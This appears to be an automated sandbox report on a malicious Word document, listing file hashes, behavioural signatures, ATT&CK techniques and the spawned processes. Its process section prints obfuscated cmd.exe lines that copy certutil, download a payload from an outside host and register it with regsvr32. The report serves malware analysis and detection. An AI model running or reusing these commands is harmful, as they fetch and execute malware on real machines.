Overview

overview

10

Static

static

legal pape...20.doc

windows7_x64

10

legal pape...20.doc

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    28-07-2020 19:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    legal paper_07.28.2020.doc

  • Size

    109KB

  • MD5

    27e1c0980b1737357b041154ac43acd2

  • SHA1

    686b652ec115e4ff259928b9b66cdbd4aaac7ce9

  • SHA256

    8d75e83e570e8faba7bfaf17b7d836d35681cd45e0bcf5366e29381fefb04dc1

  • SHA512

    f222fdf92eba821de1a8d6e809bc4846b5738b3195d7256f2214aaa3e479536804720befb8878318bc0462276b704a2f73a8b1a39aa1f4eb6c9e1dabcfe85195

Score
10/10

Malware Config

Signatures

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal paper_07.28.2020.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:3952
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
      2⤵
      • Process spawned unexpected child process
      PID:1264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://apc846.com/bolb/jaent.php?l=liut2.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2184

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1264-3-0x0000000000000000-mapping.dmp
    Download
  • memory/2184-4-0x0000000000000000-mapping.dmp
    Download